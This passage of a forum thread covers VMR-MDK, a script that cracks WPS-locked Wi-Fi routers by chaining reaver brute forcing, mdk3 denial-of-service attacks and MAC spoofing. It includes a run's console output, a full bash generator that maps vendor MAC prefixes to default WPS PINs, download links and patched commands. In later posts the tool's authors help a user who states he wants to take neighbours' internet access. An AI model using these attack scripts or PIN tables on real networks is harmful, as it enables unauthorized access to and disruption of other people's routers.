  7) MDK Attack Type 0-15(Stage III)        default= 4   [ 14 ]
  8) Time in sec MDK3 is active(Stage III)  default= 15  [ 15 ]
  9) Router Reset w/ Wash in sec(Stage IV)  default= 120 [ 90 ]
  10) Reaver countdown timer(Stage II) y/n  default= y   [ y ]
  11) MDK3 countdown timer(Stage III) y/n   default= n   [ y ]
  12) WASH countdown timer(Stage IV) y/n    default= y   [ y ]
  13) Dampen MDK3(Stage III) y/n            default= y   [ y ]
  14) Advanced Scanning in sec y/n          default= 120 [ 120 ]
  15) Aireplay --fakeauth(Stage I/II) y/n   default= y   [ y ]
  16) Aireplay --Deauth(Stage I/II) y/n     default= n   [ n ]
  17) Use --dhsmall Reaver(Stage I/II) y/n  default= y   [ y ]
  18) Enter spoof mac address y/n           default= n   [ n ]
  19) Mac address to spoof in hex AA:BC:DD:33:22:11     [ 94:39:E5:D7:28:95 ]
  20) Use Pixiewps1.1(Stage IV) y/n         default= y   [ y ]
  21) Retest WPS pin 12345670 y/n           default= y   [ y ]
  22) Retest pin 12345670 every x cycles    default= 10  [ 50 ]
      c/C)ontinue
c

   The configuration file:
        /root/VARMAC_CONFIG/targetap-FFFFFFFFFFFF
             is loading......
  The file can be changed with leafpad anytime. Make your changes and save.
  The file is reloaded at the start of Stage II,III and IV.
    If no error messages are seen above press (y/Y) to continue....
  If error messages ARE SEEN enter (n/N) and correct the errors.

    Enter y/Y or n/N
y

  How many times do you want the program to cycle thru the targetAP? (COUNT)

     !!!!Enter a number less then 100,000!!!!
1000

  You entered 1000 type (y/Y) to confirm or (n/N) to try again.
y



    Do you wish to use a default or known WPS Pin against the targetAP?

  Select (y/Y) to use a specific WPS Pin.

  --> Enter  (n/N) to brute force all 11,000 pins.<--

  For help on this subject enter (h/H).
  !!!WARNING if you select (y/Y) read the help files FIRST!!!
n

  You entered n type (y/Y) to confirm or (n/N) to try again.
y
  Assigning a random mac address to wlan0.
Current MAC:   7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
New MAC:       f6:fe:b6:59:e7:19 (unknown)
  Assigning wlan0 mac address to mon0.
Current MAC:   7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
New MAC:       f6:fe:b6:59:e7:19 (unknown)


InterfaceChipsetDriver

wlan0Unknown mt7601u - [phy0]
(monitor mode enabled on mon1)
mon0Unknown mt7601u - [phy0]

Current MAC:   7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
[ERROR] Could not change MAC: interface up or insufficient permissions: Device or resource busy


InterfaceChipsetDriver

wlan0Unknown mt7601u - [phy0]
(monitor mode enabled on mon2)
mon0Unknown mt7601u - [phy0]
mon1Unknown mt7601u - [phy0]

Current MAC:   7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
New MAC:       fe:4b:2b:f9:80:af (unknown)
 
 Program is starting please standby......
 
             Starting Reaver
 TargetAP Name                      = targetap
 Monitor                            = mon0
 Channel(note 0 = channel hopping)  = 1
 Mac code of Target AP              = XX:XX:XX:XX:XX:XX
 Random Mac code                    = f6:fe:b6:59:e7:19 
 Reaver live time                   = 90 sec
 Reaver start/stop cycles remaining = 1000
 Recurring-delay pin attempts x     = 2 x
 Recurring-delay sleep in sec y     = 15 sec
 Text Log in   /root/VARMAC_LOGS    = targetap-151126-14:06-0001
 Maximum Reaver Prescanning Time    = 120 sec
 Using Config File/root/VARMAC_CONFIG/targetap-FFFFFFFFFFFF
 Router Pause/Recovery Time         = 90 sec
 MDK3 Attack Time                   = 15 sec
 MDK3 Attack Type 14 = DOS1/DOS2/Invalid SSID3
 Monitor WPS Pin Collection - Adjust Reaver Live Time Accordingly!!!

    Starting Stage I
  1. Scanning targetap-151126-14:06-0001 for AP activity(Stage I).

  2. Scanning targetap-151126-14:06-0001 for AP activity(Stage I).

 Stage II Started - Reaver live time remaining.  00:01:29


Only error i've got is this (not sure if it's critical though):

Code: [Select]
[ERROR] Could not change MAC: interface up or insufficient permissions: Device or resource busy
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: misterx on November 26, 2015, 04:09:20 pm
Try Kali.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 27, 2015, 06:09:47 am
To .brunoaduarte

    Ref the error code sometimes during the macchanging routines the wifi device lags behind the program in its response and an error occurs. We had to place alot of sleep 2 commands in the macchanging module to get it to run on slow persistent usb machines and long 5 meter wifi usb extension cables. But to be fair we are only guessing here.

     If you develop a method to run this program you should write up the step by step procedures and place them in forums dedicated to your OS.

     As far as we can see the script is functioning but we would also need to see the xterm window output.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 25, 2016, 12:59:54 pm
Due to changes in text output for such dependencies as ifconfig, VMR-MDK was rewritten to accept both Kali 2.0 and Kali 2016.1Rolling.

You can download VMR-MDK-K2-2016R-011x9.zip package at

http://www.datafilehost.com/d/fd192b6d

Musket Teams

Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Henk on January 28, 2016, 11:04:01 am
Due to changes in text output for such dependencies as ifconfig, VMR-MDK was rewritten to accept both Kali 2.0 and Kali 2016.1Rolling.

You can download VMR-MDK-K2-2016R-011x9.zip package at

http://www.datafilehost.com/d/fd192b6d

Musket Teams
thanks guys for the great work !
However m still facing the "No such File or directory" trouble although I've installed the 32 libs in Kali 2.0.
Hope I could get some help about this  ;D
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: meffovic on January 29, 2016, 05:13:42 pm
Due to changes in text output for such dependencies as ifconfig, VMR-MDK was rewritten to accept both Kali 2.0 and Kali 2016.1Rolling.

You can download VMR-MDK-K2-2016R-011x9.zip package at

http://www.datafilehost.com/d/fd192b6d

Musket Teams
thanks guys for the great work !
However m still facing the "No such File or directory" trouble although I've installed the 32 libs in Kali 2.0.
Hope I could get some help about this  ;D

I had the same problem.
The only way I could solve this, was to unpack the zip in the /root/ directory,
if you do this it will work.

Good luck!
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: osys on March 01, 2016, 10:06:33 am
Got working on Kali Rolling with Locked AP TL-WR842ND. Not too much to wait though  ;)
Pin and Key were the same: 45576072

Confirmed working, Thanks!
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: devilsadvocate on March 06, 2016, 03:41:55 am
The script seems to work, but a couple modifications are needed.

1. The "wash" command needs to have an option that takes fcs into account.  There is a switch with the wash command, "--ignore-fcs", that needs to be used sometimes in order to get the correct output from wash.  Consider adding that option in the config file.  Modifying the script was easy enough for me to figure out though.

2. Consider adding more documentation on the default wps pins that are generated.  Certain vendors conversion schemes (like from MAC address to pin; e.g. Hitron) could be documented.

3. A quick install script for the live version of Kali would be nice.

4. Also, "make clean" needs to be one of the steps for the installation of the custom mdk3 version that comes with this.

For a beta, this is good.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: kcdtv on March 06, 2016, 12:23:52 pm
Quote
2. Consider adding more documentation on the default wps pins that are generated.  Certain vendors conversion schemes (like from MAC address to pin; e.g. Hitron) could be documented.

Well, speaking about that....
  @ Muskett

I would have really appreciated that you  gave the credits correctly as this part is literally  copy-paste of my script....

Code: [Select]
############## Start Of WPSPIN-1.3 Default Pin Generater ##############

ESSID=$(echo $NAME1)
BSSID=$(echo $MACALNUM)

FUNC_CHECKSUM(){
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`

DIGIT=`expr $ACCUM '%' 10`
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`

PIN=`expr $PIN '+' $CHECKSUM`
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`

RESTE=`expr $ACCUM '%' 10` it
 }

CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
 it
FINBSSID=$(echo $BSSID | cut -d ':' -f4-)

MAC=$(echo $FINBSSID | tr -d ':')

CONVERTEDMAC=$(printf '%d\n' 0x$MAC)

FINESSID=$(echo $ESSID | cut -d '-' -f2)

PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')

CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')

MACESSID=$(echo $PAREMAC$FINESSID)

STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`

PIN=`expr 10 '*' $STRING`

FUNC_CHECKSUM

PINWPS1=$(printf '%08d\n' $PIN)

STRING2=`expr $STRING '+' 8`
PIN=`expr 10 '*' $STRING2`

FUNC_CHECKSUM

PINWPS2=$(printf '%08d\n' $PIN)

STRING3=`expr $STRING '+' 14`
PIN=`expr 10 '*' $STRING3`

FUNC_CHECKSUM

PINWPS3=$(printf '%08d\n' $PIN)

if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&  [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&  [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];

then

CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)

RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`

STRING4=`expr $RAIZ '+' 7`

PIN=`expr 10 '*' $STRING4`

FUNC_CHECKSUM

PINWPS4=$(printf '%08d\n' $PIN)

echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS4  "
PIN4REAVER=$PINWPS4
else
case $CHECKBSSID in
04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1 
$info"  Other Possible Pin"$info:$yel $PINWPS2 
$info"  Other Possible Pin"$info:$yel $PINWPS3"
PIN4REAVER=$PINWPS1
;;
001915)
echo -e "$info"  Other Possible Pin"$info:$yel 12345670"
PIN4REAVER=12345670
;;
404A03)
echo -e "$info"  Other Possible Pin"$info:$yel 11866428"
PIN4REAVER=11866428
;;
F43E61 | 001FA4)
echo -e "$info"  Other Possible Pin"$info:$yel 12345670"
PIN4REAVER=12345670
;;
001A2B)
if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$info"  Other Possible Pin"$info:$yel 88478760"
PIN4REAVER=88478760
else
echo -e "PIN POSSIBLE... > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
3872C0)
if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$info"  Other Possible Pin"$info:$yel 18836486"
PIN4REAVER=18836486
else
echo -e "PIN POSSIBLE    > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
FCF528)
echo -e "$info"  Other Possible Pin"$info:$yel 20329761"
PIN4REAVER=20329761
;;
3039F2)
echo -e "  several possible PINs, ranked in order> 
 16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
A4526F)
echo -e "  several possible PINs, ranked in order> 
 16538061 88202907 73767053 16702738 43297917 18355604 "
PIN4REAVER=16538061
;;
74888B)
echo -e "  several possible PINs, ranked in order> 
 43297917 73767053 88202907 16538061 16702738 18355604"
PIN4REAVER=43297917
;;
DC0B1A)
echo -e "  several possible PINs, ranked in order> 
 16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1 "
PIN4REAVER=$PINWPS1
;;
002275)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
08863B)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
001CDF)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
00A026)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
5057F0)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
C83A35 | 00B00C | 081075)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
E47CF9 | 801F02)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
0022F7)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
*)
##echo -e $info"  Other Possible Pin$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
echo -e "$txtrst"
;;
esac

fi

  It is not called "WPSPIN default PIn generator" (that's another one)  but WPSPIN
And i asked specifically to not remove the original annotations in the checksum function that was written by antares...
  I hope you change this otherwise i would report this thread here and in kali forum for not respecting GPL v3 and ask to administrators to remove it.
Sorry for being kind of a jerk, nothing personal and it is not about having my name somewhere, I realy don't giva a sh... but i am a tired to see my code used and used over without any credits.
It is just a matter of principles.
It is not difficult to give credits when you copy paste a code and if you would do so devilsadvocate and other user could go to the source and find all the information they need about the supported device, the history about the discovery of this breach etc...
Have a good sunday and please my dear Muskett: respect free code ;)
(For the record and if anyone doubt about what i say they can download the 1.3 version code here http://www.crack-wifi.com/forum/img/members/1840/WPSPIN.zip (http://www.crack-wifi.com/forum/img/members/1840/WPSPIN.zip) and read the threat where ti was published : http://www.crack-wifi.com/forum/topic-8793-wpspin-generateur-pin-wps-par-defaut-routeurs-huawei-belkin.html (http://www.crack-wifi.com/forum/topic-8793-wpspin-generateur-pin-wps-par-defaut-routeurs-huawei-belkin.html))
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2016, 03:47:54 pm
To kcdtv,

    Thanks for pointing out our error. We found the routine embedded in another script. For the record NONE of the pin routines were written by Musket Teams.  And we did not download it from the source. The only alterations we made was the pin output and we certainly did not alter the checksum functions you mentioned.     
   We will be happy to give you credit for whatever you say is yours or remove the entire WPS pin module at your request whenever we issue an update. Great work by the way and we donot think you are wrong here.

Musket Teams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2016, 04:20:19 pm
To devilsadvocate

    You can easily patch the wash output to meet your requirements by adding a -C to the lines of code indicated below.

If you are using
VMR-MDK-K2-2016R-011x9.sh

Line 5077

xterm -g 100x30-1+1 -T "wash" -e "wash -i $MON -C 2>&1 | tee VARMAC_WASH/wash.01.txt" &

Line 7901

xterm -g 100x30-1+1 -T "wash" -e "wash -i $MON -C 2>&1 | tee VARMAC_WASH/wash.01.txt" &

If you are using the kali 1.10a the program uses Eterm instead of xterm. If the k2 version the code line number will be different. If you have any problem post your version and we will post the patch for you.

    We are not sure what the make clean command would do to placement of mdk3. We will have to consult the author of the C program.

    Reference documentation we did not even know what you meant until kcdtv explained it to us as the source was unknown. We copied the program from another script posted here. As kcdtv has posted the source he/she probably can give the latest status on default pin generators better then us. 

    We donot think the program could be run in live as these attacks can go on for weeks and the pin counts have to be saved. This would be lost between reboots.
 
    Thanks for your input.

     Musket Teams
 
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: devilsadvocate on March 06, 2016, 06:10:05 pm
    We donot think the program could be run in live as these attacks can go on for weeks and the pin counts have to be saved. This would be lost between reboots.

Saving the data across reboots is easy enough.  Since I run the Kali OS from a live usb drive, I can copy all of the relevant directories and scripts to a second flash drive.  I simply copy /root/VARMAC* and /etc/reaver to my second flash drive (the drive that doesn't boot Kali) as well as your script which I have modified (just the wash command).  There are some other items under /root that I also copy, like WPSpin.py and easybox_wps.py for example.

Every time I boot Kali from a live USB, I simply restore that data to their respective locations.  After I reinstall the custom mdk3, I'm good to go.  This is what I mean by an install script for the live version of Kali.

Also, I would like to report some behavior that I have witnessed on some Netgear APs.  It seems that some Netgear APs are aware that Reaver always starts with the code, "12345670".  The result of this is that those routers will WPS lock right away.  I haven't found a workaround yet (if there even is one).  I realize that a mod to Reaver may be necessary.  Is there a version of Reaver that doesn't use "12345670" right from the start?
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: kcdtv on March 06, 2016, 09:09:00 pm
Good evening Musket team
  Sorry if i was not very nice with you in my previous message  :D
 I was kind of surprise to see my old code as i was checking out which algorithm you did use, and i was even more surprise to see this kind of behaviour in one of your work
  I understand now why it happened...   :P
  There is absolutely not any problem to use my script, i choosed to published it as a bash script with GPL3 for that.  :)
  If you don't mid, i would you like to replace the line
Code: [Select]
############## Start Of WPSPIN-1.3 Default Pin Generater ##############by this one
Code: [Select]
############## Start Of WPSPIN-1.3 by kcdtv for www.crack-wifi.com ##############  And that you add some comment in the line where you declare the function for checksum (some lines afters)
Instead of
 
Code: [Select]
FUNC_CHECKSUM(){Something like this
Code: [Select]
FUNC_CHECKSUM(){       # function written by antares_145 from crack-wifi.comthanks in advance
   
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2016, 11:23:43 pm
To devilsadvocate

   There is a reaver program called ryreaver-reverse. There is no installation, you run the program with ./ryreaver-reverse from root. You must use the --session=<> command to save the work or the program starts the attack all over again. It also doesnot support pixiedust but you can test for pixiedust data sequences with the normal reaver program by setting the --pin= to some pin other then 12345670. Then use PDDSA-06.sh to test for the pin. If no pin found you can restart ryreaver-reverse.

    The pin matter with Netgear is interesting - We will pass it on

    The download should be still on the net. If not post here and MTeams will upload it to datahost and aircrack-ng for you.

    Reference the loading of files from a live session. There must be a reason you are not using a persistent usb install or a HardDrive install. Please explain?



Musket Teams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2016, 11:31:45 pm
To kcdtv

     We copied your additions to an update file and will include your request and probably one better at the  script start whenever an update is required. We expect that Kali-linux 2016.1R will be updated soon which then may require further coding.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: devilsadvocate on March 07, 2016, 04:05:28 am
    Reference the loading of files from a live session. There must be a reason you are not using a persistent usb install or a HardDrive install. Please explain?

Musket Teams
Simply, I don't wish to dedicate an entire hard drive or flash drive to a persistent install.  Using a live version of the OS and simply copying files as needed works well for me.

I'll probably write the script myself.  No big deal.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: kcdtv on March 07, 2016, 11:10:57 am
Thanks Musket  ;)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: 0ops on March 08, 2016, 12:42:45 am
i tried installing it in kali rolling but it saye same thing in kali forus No such File or directory"  ...also asked the same thing in kali forums but did not got any solution.

are you working on updating the script
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 08, 2016, 11:34:50 am
See the new download addresses however try unziping in root. You should get a package of files not an exe file.

Place the script in root

chmod 755  VMR-MDK script

then

./VMR-MDK script


File should run

MTeams

We are not updating at this time as the script is running fine in all our computer.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: lockback on March 17, 2016, 10:10:54 am
hello, also works with unlocked wps?
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 20, 2016, 07:43:42 am
To lockback:
     If you are asking if it can work against Open WPS systems then yes it can work but for open WPS systems you are far better off using the command line with reaver or bully. Employing DDOS available thru VMR-MDK could have a negative effect. If however you turn off the DDOS process of stage three during the setup it could work.

     Suggest you try the command line first. If you still want to use VMR-MDK then read the help files carefully.

      MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: lockback on March 21, 2016, 02:28:11 pm
thanks  :D
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 29, 2016, 03:50:05 am
MTeams notes in the help files that the VMR-MDK process only works on a subset of routers and each router must be individually tested to see if slow pin harvesting can be induced.

   MTeams suggests users try the program when a client is associated and moving data and possibly spoof the mac of the client as well.

   Spoofing the mac address of the client is supported thru entries in the configuration file.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: kumukumu on April 23, 2016, 06:42:25 am

Hello,

I've read your replies and answers on this thread, and i say "huwattt" hehehhe... i know that you do not like spoon feeding to the newbies like me. I tried to hack wifi last 2014 and then i came back again for fun and seeking free neighbors internet to play league of legends :). huehuehue..
Well i run kali linux 1.0 in VMware and i use Ralink 3070 Outdoor USB Wireless Adapter Antenna. Also, i use the Minidwep-gtk to hack wifi, since i used it along ago to hack via reaver and now, guess what,out of 30 wifi's 3 of them are with WPS when i scan using minidwep. When i try to use Reaver on them i received AP rate limiting or cannot associate with the .......

i am curious with the Cracking WPS locked Routers, since out of 30 wifi's 3 of them has a WPS when i scan thru Minidwep-gtk..



Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 23, 2016, 02:53:30 pm
MTeams do not mind assisting you.  You are using Kali 1.10a. Make sure pixiedust mods are installed. We suggest using a persistent usb rather then VM ware. We know nothing about your equipment or Minidwep.

All the information you need concerning VMR-MDK is found in the help files that are enclosed in the download package.

There is a version for kali 2.0 and 2016R but suggest you avoid 2016R at present.

MTeams



Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: blackcat201 on June 22, 2017, 10:53:15 pm
I am using vmr-mdk-kali2 -kali2016
Stage 2 (reaver) not working   :'(
Please help me
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: EASD on June 25, 2017, 07:15:44 pm
I tried to use vmr-mdk on kali2017 (on vmware)
I am using external card wifi ,all programs is ok (also fluxion is ok)
when I used VMR-MDK-K2-2016R-011x9 in this sequence
1-assume it is in root folder
2-chmod +x VMR-MDK-K2-2016R-011x9
3-./VMR-MDK-K2-2016R-011x9
and program is run
I followed the steps but after the program is running do only stage 1 (Just scan AP Activity) for 10 times
and give me wps pin failed and then need to restart
what is wrong with me